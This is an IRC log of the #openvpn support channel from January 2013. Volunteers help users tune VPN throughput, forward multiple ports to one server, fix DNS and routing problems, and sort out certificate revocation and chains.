[mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 12:43 -!- Eagleman [~Eagleman@5.45.183.189] has joined #openvpn 12:43 -!- zz_AsadH is now known as AsadH 12:44 < Eagleman> Are there ways to improve the connection bandwidth when using redirect-gateway ? 12:45 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer] 12:46 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 12:47 < combat7331> !man 12:47 <+pekster> Eagleman: That depends completely on where your bottleneck is. You're going to be limited at a theoretical level to the bandwidth of the VPN link in such a case, plus whatever limits your server has on its uplink 12:48 < Eagleman> This is what currently happens, when i test the openvpn endpoint it reaches 80-80 Down-Up: http://imagebin.org/243705 12:48 <+pekster> That's not surprising. What is your server provisioned for? 12:48 < Eagleman> VPS 12:48 <+pekster> No, bandwidth-wise 12:49 <+pekster> Maybe you mis-understand how redirect-gateway works; all the client traffic is sent to the remote endpoint, and it then routes the traffic through that point on the Internet. You're limited both in terms of the VPN link itself and the aggrigate of all traffic that host is generating against its provisioned limits 12:49 < Eagleman> pekster, just did a test: http://www.speedtest.net/result/2452448715.png 12:50 <+pekster> Oh the server? 12:50 < Eagleman> yes 12:50 < Eagleman> It higher than my current network 12:50 -!- Wintereise [~reise@unaffiliated/wintereise] has quit [Ping timeout: 252 seconds] 12:50 <+pekster> You can try increasing the --replay-window beyond default values 12:51 < Eagleman> 79 vs 57 down and 42 vs 5 up 12:51 <+pekster> You might be running into window-limitations on how many packets out the encrypted stream is willing to support 12:51 <+pekster> Try 2x or 4x the default packet value (you need that on both peers) and see if your situation improves after a client reconnect 12:52 < Eagleman> will try 12:52 <+pekster> CPU shouldn't be an issue, but you can rule it out by making sure you don't peg a core on either the client or server to verify it's not a problem there 12:52 < Eagleman> resource wise its not even using enough worth to mention 12:53 < Eagleman> 2-3% increase of cpu power 12:53 <+pekster> Yea, that's usually the case unless you use embedded hardware or load a single-server instance up 12:54 < Eagleman> --replay-window n [t] You are talking about the default 64 in n ? 12:54 <+pekster> Yea. You can really leave t alone (it's optional anyway.) Try 128 or 256 and see if results improve 12:55 <+pekster> If they do, see what the value after which you stop seeing improvement; you want to keep that "as low as feasible" becuase it limits replay attacks that can be performed, but too low and it'll interfere with packet delivery where the product if your bandwidth & latency is high (IIRC the manpage notes this too) 12:56 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 12:56 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 12:57 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 12:57 -!- Wintereise [Wintereise@113.11.122.231] has quit [Changing host] 12:57 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 12:57 < Eagleman7> wow 12:58 < Eagleman7> The overhead is almost eliminated 12:58 < Eagleman7> http://www.speedtest.net/result/2452470216.png 12:58 -!- Eagleman [~Eagleman@5.45.183.189] has quit [Ping timeout: 255 seconds] 12:58 <+pekster> Part of the issue is a fairly high bandwidth your server has combined with a ~100ms increase in latency across the VPN 12:58 <+pekster> That's a non-trivial amount of latency given the bw you're pushing 12:59 < Eagleman7> Which issue? 12:59 < Eagleman7> I think i missed a part 12:59 <+pekster> Lower VPN bw verses link potential 12:59 < Eagleman7> [19:55] Ow, i am still on a tcp connection is when i disconnected 13:00 <+pekster> The manpage explains in plenty of detail what the option does at a technical level, but basically you're pushing packets so fast it's dropping them as detected "replay attack" packets. If you use 'verb 4' you can see those warnings in your logs too 13:00 < Eagleman7> That only happens with tcp ? 13:01 <+pekster> It only happens with udp 13:01 <+pekster> (as the OpenVPN encapsulating protocol) 13:01 <+pekster> TCP has guarenteed delivery and ordering built into the protocol 13:01 < Eagleman7> hmm, i switched from tcp to udp and it elminated the overhead 13:01 -!- Tomoyo [Wintereise@113.11.122.231] has joined #openvpn 13:02 -!- Tomoyo is now known as Guest88161 13:02 <+pekster> You don't want to use tcp as the ovpn protocol unless you need it for some reason 13:02 <+pekster> It's a waste of overhead and performs poorly when encapsulating another TCP stream inside 13:03 < Eagleman7> pekster the main reason i was using it is becuase my school is almost blocking every port, so i used 443 with tcp 13:03 <+pekster> I'll sometimes run a 2nd VPN server on some common TCP ports, but often you can get away with UDP on ports 53 or similarlly common values 13:03 < EugeneKay> You can almost always find an open udp port 13:04 <+pekster> An IDS/DPI system will catch it, but it's not too common to find those on general-access networks 13:04 <+pekster> I tend to run 2 servers, one for UDP and another (backup-only) on TCP and just forward a slew of common ports if I'm not using them so I have good chance for remote access on abusive firewalls 13:05 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Ping timeout: 240 seconds] 13:06 < Eagleman7> Cant remember which ports are open, i am currently doing my internship so i cant test it out for a few weeks 13:06 < Eagleman7> But i will when i back 13:06 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 13:06 -!- mode/#openvpn [+o vpnHelper] by ChanServ 13:08 < Eagleman7> SHould also setup my openvpn server to listen to multiple ports 13:08 <+pekster> OpenVPN won't do that; your firewall/NAT setup can enable it though 13:09 < Eagleman7> Multiple instances* 13:10 <+pekster> '-A PREROUTING -p udp -m multiport --dports 1194,53,66,67,161 -j DNAT --to-destination $IP_GOES_HERE:1194' or similar 13:10 -!- mdw [~mdw@cpc8-dals18-2-0-cust303.hari.cable.virginmedia.com] has quit [Quit: [self sleep]] 13:10 <+pekster> Sure, multiple instances too, but I'm not going to run dozens of instances just to get them exposed on multiple ports 13:10 < Eagleman7> Aha, thanks will save it 13:10 < Eagleman7> well i need atleast to, one for udp and tcp right? 13:11 < Eagleman7> to=two 13:11 <+pekster> If you want both options, yes 13:11 <+pekster> So that's a minimum of 2 openvpn instances, one per protocol. Each needs its own unique network, but you can route between them if you'd like 13:11 <+pekster> (just set the firewall to do it and enable IP forwarding) 13:12 <+pekster> Erm, 67 & 68 was what I meant. I'm sure google can suggest other common ports too 13:13 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 244 seconds] 13:13 < ngharo> pekster: can I bounce an idea off you? Thinkin of making a VPN only accessable web dashboard for my users to modify their routes. Toggle buttons to route out Tor transparent proxy and/or toggle button to route out another VPN tunnel. I'd need to make a sudo exception to allow httpd user to modify routes. Thoughts? 13:14 <+pekster> Why do that server-side? A client-side app can just as easily manage routes if that's your goal 13:15 <+pekster> Otherwise sure, CGI can be configured to use suexec or similar and set the UID/GID of the CGI to do what you need, or have it call a privelage-elevating command (such as via sudo or a suid binary) 13:16 <+pekster> Normally use limit the scope of such elevation as much as possible to limit the potential for a scripting error to an attacker looking to gain access 13:16 < ngharo> guess i'm thinking server-side so I dont have to write platform specific apps 13:16 < ngharo> i'm running a second apache instance bound to tun0 13:17 < combat7331> hello pekster 13:17 < combat7331> If i setup round robin DNS 13:17 < ngharo> still a bit nervous about running commands as root with user input, but my users *shouldn't* be messing around 13:17 <+pekster> Treat security on the httpd the same as you would normally, since you presumably don't want "any" VPN user able to abuse your system 13:17 < combat7331> will it show the same on the external ip. 13:17 <+pekster> Yea 13:17 < combat7331> ?* 13:18 <+pekster> combat7331: No clue. That's well outside the scope of OpenVPN at that point, and boils down to your implementation details 13:18 < ngharo> pekster: ok kewl. thanks, just wanted to make sure I wasn't crafting up a horrible idea 13:18 < combat7331> if i connect to IP "179.56.96.33" will it show as external IP that or the one that is assigned to the default internface? 13:19 < combat7331> interface* 13:19 <+pekster> It's only horrible if you implement it horribly ;) 13:19 < Eagleman7> Thanks for helping pekster, i have to generate some certificates now :). Cya 13:20 < combat7331> local 179.56.96.33-35 13:20 < combat7331> can i do that? 13:21 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has left #openvpn [] 13:21 <+pekster> combat7331: huh? No. What are you trying to do, exactly? --local is for binding the OpenVPN socket to a specific IP 13:22 < combat7331> Random external IP on connection 13:22 < combat7331> i tried via clientconnect 13:22 < combat7331> but I dont understand the ifconfig-push arguments 13:23 <+pekster> They're the same as the --ifconfig directive, but the server sends to the client 13:24 < combat7331> so I would do this in the client connect script: ifconfig-push 179.56.96.33 13:24 <+pekster> Okay, the manpage tells you that you need 2 arguments 13:24 <+pekster> So no. Supply the 2nd arguemnt depenidng on your topology 13:25 < combat7331> ifconfig-push ? 13:25 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 13:25 * pekster sighs 13:25 <+pekster> OpenVPN is *not* responsible for tying a private IP to a public one 13:25 <+pekster> Do that yourself, using whatever firewall/NAT tools you prefer on your OS 13:25 < combat7331> thats not what I want 13:26 <+pekster> Bummer. OpenVPN can't magically maintain an external association outside of its own process 13:26 < combat7331> I just want that everytime somebody connects to my VPN gets a different IP address externally that is shown to the internet. 13:26 <+pekster> I'd like OpenVPn to make me breakfast too, but it lacks support to do that 13:26 < Eagleman7> Any idea why all my internet browsers stop working after i disconnect the openvpn connection? I can nslookup and ping everything just fine, and restarting the webbrowser does not help either, i'm on windows 13:27 <+pekster> combat7331: Then go develop a solution to do that. Write some code to make the assocation between the rfc1918 space you're giving clients, or give them a public IP directly via some code you write to get a random assignment and route traffic to them 13:27 <+pekster> Either way you need to WRITE YOUR OWN CODE to do that. I'm not going to work for free for your business 13:27 <+pekster> OpenVPN does *not* support what you're asking out of the box 13:27 <+pekster> So, go do what business owners do and develop a solution to your problem 13:28 < combat7331> Sure, thanks for the help though :) 13:29 < Eagleman7> Any idea why all my internet browsers keep saying cannot make a connection [ WEBSITE ] after i disconnect the openvpn connection? I can nslookup and ping everything just fine, and restarting the webbrowser does not help either, i'm on windows 13:30 <+pekster> browser proxy perhaps? If you can ping the same target you can't brorwse to, either the browser is misconfigured to connect via the same path, or some firewall is blocking the access (or the host is simply down) 13:31 <+pekster> Doesn't sound like an OpenVPN problem if you can reach the host via other protocols/programs 13:34 < Eagleman7> I go with a restart then 13:34 < Eagleman7> I cant troubleshoot browsers 13:35 -!- combat7331 [~Mamba@d54C66165.access.telenet.be] has quit [] 13:41 -!- Eagleman7 [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 13:52 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has joined #openvpn 14:00 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 14:00 -!- MeanderingCode [~Meanderin@199.254.238.179] has quit [Ping timeout: 252 seconds] 14:01 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has joined #openvpn 14:08 -!- dazo_afk is now known as dazo 14:18 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 14:34 -!- brute11k [~brute11k@89.249.230.101] has quit [Quit: Leaving.] 14:35 -!- brute11k [~brute11k@89.249.230.101] has joined #openvpn 14:36 -!- Orbi [~opera@anon-186-58.vpn.ipredator.se] has joined #openvpn 14:39 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn 14:40 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 14:51 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 14:55 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 15:00 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 15:06 < dioz> haha 15:32 < Orbi> Hi, after a pppoe reset OpenVPN does not always reestablish connection. I want to re-launch openvpn with a bash script. Is it possible to capture the 'Initialization Sequence Completed' message of OpenVPN to use it in the script? 15:40 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 264 seconds] 15:43 < kisom> Orbi: You should just let openvpn handle the reconnection. Check the logs and see why it does not reconnect. 15:43 -!- KaiForce [~chatzilla@adsl-70-228-76-146.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0.1/20130116073211]] 15:45 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:48 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat] 15:50 < Orbi> It is a DNS problem, the client cannot resolve the host address. 15:51 -!- Minnebo_ [~Minnebo@78-23-254-38.access.telenet.be] has quit [Ping timeout: 248 seconds] 15:52 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:53 < dioz> i'll just troll and say... set the ip address in the .ovpn ? 15:53 -!- dydzEz2__ [~dydzEz2@2601:d:4a80:72:5d05:b2a0:d5f9:d9ad] has joined #openvpn 15:54 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 15:56 -!- dydzEz2_ [Konigsberg@c-67-163-13-78.hsd1.il.comcast.net] has quit [Ping timeout: 252 seconds] 15:56 < Orbi> I could, but I'd say it doesn't play nice with dnsmasq. Since I have several computers on the network and that OpenVPN runs on the router, every computer on the network has DNS problem. 15:58 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 15:59 <+pekster> How is that related to openvpn? Use the IP if DNS isn't available when you (re)connect. Otherwise each time a connection is attempted after any timeout, the process will attempt to resolve any DNS name in the 'remote' directive on each connect attempt (persuant to any --resolv-retry setting, which defaults to "infinite" 15:59 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has quit [Ping timeout: 245 seconds] 15:59 <+pekster> I fail to see how a pppoe event (even if you get a new IP) prevents you from performing a DNS lookup 16:01 < Orbi> I don't know how it is related, that's what I'm trying to figure out. If openvpn is killed before the pppoe connection reset, DNS lookup is fine. 16:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:05 -!- Valcorb [~Valcorb@94-226-106-113.access.telenet.be] has quit [] 16:15 -!- Orbi [~opera@anon-186-58.vpn.ipredator.se] has quit [Ping timeout: 245 seconds] 16:26 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit [] 16:33 -!- Orbi [~opera@anon-185-71.vpn.ipredator.se] has joined #openvpn 16:38 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has joined #openvpn 16:39 -!- videl [~pi@fac34-3-82-231-26-27.fbx.proxad.net] has joined #openvpn 16:40 <+pekster> Orbi: It might be binding to the interface that gets torn down. a HUP should fix that, which I suggested a few days ago that you tie into your distro's network post-connection script for the uplink interface 16:41 <+pekster> My suggestion still stands 16:41 -!- u0m3_ [~Radu@92.80.72.203] has quit [Ping timeout: 248 seconds] 16:46 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has joined #openvpn 17:04 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:05 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Remote host closed the connection] 17:15 -!- Orbi [~opera@anon-185-71.vpn.ipredator.se] has quit [Quit: Orbi] 17:18 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 260 seconds] 17:18 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 17:18 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 17:19 -!- Devastator [~devas@186.214.14.9] has joined #openvpn 17:21 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn 17:31 -!- dazo is now known as dazo_afk 17:34 < dvl> Late last week I installed FreeBSD 9.1 onto a gmirror, which I created during the install process. I documented it via photographs and comments. Hopefully, the next time I do this, it will be useful to refer to this resource. http://bit.ly/VW7bbN 17:34 < dvl> yeah, there's a lot of FreeBSD in here? speak up! 17:35 <+pekster> BSD has been jailed? Free BSD! :P 17:35 <+pekster> 17:40 < dvl> Not bad 17:41 <+pekster> If I decide to remove the cork from one of my wine bottles the jokes might really start to go downhill ;) 17:42 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving] 17:42 -!- tyteen4a03 [~T4@n218250229105.netvigator.com] has quit [Quit: Leaving] 17:43 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:50 -!- b1rkh0ff [~b1rkh0ff@178.77.1.83] has quit [Ping timeout: 256 seconds] 17:52 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 18:26 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-136.233.wb.wifirst.net] has quit [Read error: Operation timed out] 18:28 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 18:39 -!- Devastator [~devas@186.214.14.9] has quit [Changing host] 18:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 19:10 < EugeneKay> Mmmm beer 19:11 * pekster is torn between wine and beer 19:11 <+pekster> Although after fixing my initramfs up earlier, maybe wine is in order 19:12 <+pekster> It's always fun rebooting a box knowing that it'll either come back in a minute or two, or you'll spend the next 20 to 50 minutes with a RS232 cable sitting 2 meters from the box you just hosed ;) 19:15 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 19:16 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 19:24 < EugeneKay> My colo has three gateway boxes with keepalived to ensure it doesn't matter :-p 19:24 < EugeneKay> All of my backend boxes are ESXi with vMotion enabld, so the VMs don't care what they're running on. If one of them needs a reboot it's trivial to fix via the console 19:25 < EugeneKay> The only thing I really worry about is my NetApp SANs. I haven't gotten them running clustered quite yet(laziness), so I have to shut all of the VMs down on the one to be rebooted 19:25 < EugeneKay> Buut.... they never reboot. Ever. 19:26 < EugeneKay> One of these days I'll get a second power circuit dropped in and proper stacked switches. 19:26 < EugeneKay> But not this month 19:29 -!- clu5ter [~staff@unaffiliated/clu5ter] has quit [Ping timeout: 240 seconds] 19:30 -!- clu5ter [~staff@unaffiliated/clu5ter] has joined #openvpn 19:40 -!- raidz is now known as raidz_away 19:40 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 19:40 -!- Guest88161 [Wintereise@113.11.122.231] has left #openvpn [] 19:41 -!- Wintereise [Wintereise@unaffiliated/wintereise] has joined #openvpn 19:44 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn 20:09 -!- u0m3 [~Radu@92.80.72.203] has joined #openvpn 20:23 -!- Guest88161 [Wintereise@113.11.122.231] has joined #openvpn 20:23 -!- Wintereise [Wintereise@unaffiliated/wintereise] has quit [Ping timeout: 244 seconds] 20:27 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 21:17 -!- Wintereise [Wintereise@113.11.122.231] has joined #openvpn 21:18 -!- Guest88161 [Wintereise@113.11.122.231] has quit [Ping timeout: 256 seconds] 22:12 -!- Wintereise [Wintereise@113.11.122.231] has quit [Ping timeout: 252 seconds] 22:21 -!- ngharo [~ngharo@shepard.sypherz.com] has quit [Ping timeout: 245 seconds] 22:21 -!- khem_ [~x@lotus.redl8.com] has quit [Ping timeout: 252 seconds] 22:22 -!- ngharo [~ngharo@shepard.sypherz.com] has joined #openvpn 22:22 -!- khem_ [~x@lotus.redl8.com] has joined #openvpn 22:25 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 240 seconds] 22:36 -!- khem_ [~x@lotus.redl8.com] has quit [Ping timeout: 248 seconds] 22:37 -!- khem_ [~x@lotus.redl8.com] has joined #openvpn 22:40 -!- uberushaximus [~uberushax@shepard.sypherz.com] has quit [Ping timeout: 240 seconds] 22:42 -!- uberushaximus [~uberushax@shepard.sypherz.com] has joined #openvpn 22:56 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 252 seconds] --- Day changed Tue Jan 22 2013 00:14 -!- iml_ [~iml@c-24-60-231-68.hsd1.ct.comcast.net] has joined #openvpn 00:14 < iml_> !welcome 00:14 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum !wiki 00:14 <@vpnHelper> !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 00:41 -!- iml_ [~iml@c-24-60-231-68.hsd1.ct.comcast.net] has left #openvpn [] 00:49 -!- pekster [~rewt@openvpn/user/pekster] has quit [Quit: kernel upgrade] 00:49 -!- Otacon22 [~otacon22@isd-vpn.doshisha.ac.jp] has joined #openvpn 00:50 < Otacon22> Hi guys, I'm getting the "TLS Error: reading acknowledgement record from packet" error 00:50 < Otacon22> and I don't use tls-key on any client/server 00:51 < Otacon22> But actually I'm tunneling the openvpn connection inside a very slow udp connection 00:51 < Otacon22> if openvpn starts to send packets using an high rate, they may be dropped 01:05 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:09 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 256 seconds] 01:13 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 264 seconds] 01:13 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 01:14 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:14 -!- Qianyi [~Qianyi@180.155.14.35] has quit [Quit: Leaving] 01:24 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 01:28 -!- Minnebo_ [~Minnebo@office.exabyte.be] has joined #openvpn 01:31 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 01:39 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Quit: Leaving] 01:43 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 252 seconds] 01:50 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 01:54 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 248 seconds] 02:01 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn 02:11 -!- dydzEz2__ [~dydzEz2@2601:d:4a80:72:5d05:b2a0:d5f9:d9ad] has quit [Quit: Leaving] 02:21 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 02:22 -!- valparaiso [~valparais@ARennes-257-1-48-169.w81-53.abo.wanadoo.fr] has joined #openvpn 02:36 -!- dydzEz2 [~dydzEz2@2601:d:4a80:72:3cca:2357:4ff9:4c4f] has joined #openvpn 02:37 -!- AsadH is now known as zz_AsadH 02:54 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 02:55 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 248 seconds] 02:59 -!- Wulf [~Wulf@unaffiliated/wulf] has joined #openvpn 03:01 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 03:01 -!- mode/#openvpn [+o krzee] by ChanServ 03:05 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 03:07 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn 03:15 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 03:17 -!- MeanderingCode [~Meanderin@71-213-175-129.albq.qwest.net] has joined #openvpn 03:21 -!- MeanderingCode_ [~Meanderin@71-213-175-129.albq.qwest.net] has quit [Ping timeout: 248 seconds] 03:24 -!- dydzEz2 [~dydzEz2@2601:d:4a80:72:3cca:2357:4ff9:4c4f] has quit [Quit: Leaving] 03:53 -!- Otacon22 [~otacon22@isd-vpn.doshisha.ac.jp] has quit [Ping timeout: 272 seconds] 04:10 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn 04:10 -!- zz_AsadH is now known as AsadH 04:12 -!- defswork [~andy@141.0.50.105] has joined #openvpn 04:14 < AsadH> yo novaflash 04:14 < AsadH> novaflash novaflash 04:14 < AsadH> :( 04:15 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 04:26 -!- mXr [mxr@chello084112107202.24.11.vie.surfer.at] has joined #openvpn 04:26 < mXr> hello 04:26 < mXr> i have a strange issue with revocation of certificates, using openvpn 2.2.1 04:26 < mXr> anyone got an idea maybe... i have a certificate with a certain common name X 04:26 < mXr> it had the serial 08 04:27 < mXr> it got revoked, a long time later the person is supposed to get a new cert, so i created a new one with the same common name X, this gime it got serial number 1A 04:27 < mXr> afaik revocation checks should be based on serial 04:27 < mXr> but appearently, openvpn checks against CN? because i cannot connect due to it "being revoked" even tho it certainly is not 04:28 < mXr> is it supposed to work like that? 04:30 -!- dazo_afk is now known as dazo 04:31 -!- BtbN [~btbn@btbn.de] has quit [Ping timeout: 246 seconds] 04:35 -!- BtbN [~btbn@btbn.de] has joined #openvpn 04:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 04:38 -!- mXr [mxr@chello084112107202.24.11.vie.surfer.at] has quit [Remote host closed the connection] 04:39 -!- Orbi [~opera@anon-185-41.vpn.ipredator.se] has joined #openvpn 04:45 -!- b1rkh0ff [~b1rkh0ff@178.77.23.88] has joined #openvpn 04:47 -!- lazerbeak [~lazerbeak@unafffiliated/lazerbeak] has joined #openvpn 04:48 < lazerbeak> hi I have setup openvpn and its connecting to my vpn, but windows is still using the old connection? 04:55 -!- Mava [~Mava@ip-45-201.dhcp.opintanner.fi] has joined #openvpn 04:56 < Mava> if there is somebody, who knows about stacked and chained. could you verify that: Stacked certificate is a collection of more than one certificates and In chain, every each certificate is depending on it's issuer. 04:56 < Mava> having again human error with this certificate stack and chain ideology =/ 05:24 <@dazo> Mava: https://community.openvpn.net/openvpn/wiki/Using_Certificate_Chains 05:24 <@vpnHelper> Title: Using_Certificate_Chains – OpenVPN Community (at community.openvpn.net) 05:33 < Mava> öer.. something that I remembered 05:33 < Mava> got to put that site to bookmarks etc. that I can really find it again more easily =) 05:50 -!- AsadH is now known as zz_AsadH 05:55 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:09 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:12 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:13 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit [] 06:13 -!- Minnebo__ [~Minnebo@office.exabyte.be] has joined #openvpn 06:15 -!- Mava [~Mava@ip-45-201.dhcp.opintanner.fi] has left #openvpn [] 06:16 -!- Minnebo_ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 272 seconds] 06:18 -!- Minnebo__ [~Minnebo@office.exabyte.be] has quit [Ping timeout: 252 seconds] 06:31 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Operation timed out] 06:41 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 06:46 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 06:49 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 06:51 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has joined #openvpn 07:20 -!- Vorik [~quassel@D97950AD.cm-3-2b.dynamic.ziggo.nl] has joined #openvpn 07:22 < Vorik> Hi! I've got an openvpn server on Centos6, Selinux permissive, installed with Puppet luxflux/puppet-openvpn module. I can ping the clients from the server and vice versa, but nothing (including server ip) from the LAN. I've added routes to the client and the default gateway of the LAN. ip_forward is enabled. What could be amiss? 07:24 < Vorik> Btw, it routed all my browser traffic via the LAN. 07:40 < Vorik> so, it generally works, (connections are routed over VPN) except I cannot access any hosts on the LAN itself. 07:48 -!- tyteen4a03 [T4@n218250228096.netvigator.com] has joined #openvpn 08:09 <@dazo> Vorik: check if you have enabled IP forwarding, then check your firewall ... and then your routing 08:09 <@dazo> Vorik: in 99.9999999% of all support cases, it's guaranteed to be one or more of those three points 08:09 < Vorik> dazo: I've enabled ip_forwarding on the openvpn server, firewall is disabled 08:10 <@dazo> Vorik: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting#Usingrouting ... the scenario here should basically be what's needed 08:10 <@vpnHelper> Title: BridgingAndRouting – OpenVPN Community (at community.openvpn.net) 08:10 <@dazo> Vorik: and "firewall is disabled" .... yeah, that's what everyone says too ;-) 08:11 < Vorik> dazo: lol :) 08:11 < Vorik> I'll check that doc, thanks 08:11 <@dazo> Vorik: however, you can most likely (at least if you run openvpn in server mode) put SELinux into Enforcing .... I'm running OpenVPN on CentOS5 and ScientificLinux 6 boxes in enforcing mode .... without any issues 08:12 < Vorik> i'll make a pastie of all configs 08:12 < Vorik> :) 08:12 <@dazo> goodie :) 08:12 * dazo heads out for lunch before a meeting 08:16 < Vorik> dazo: I've put it on http://pastie.org/5822775 08:29 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 08:43 -!- gustavoz 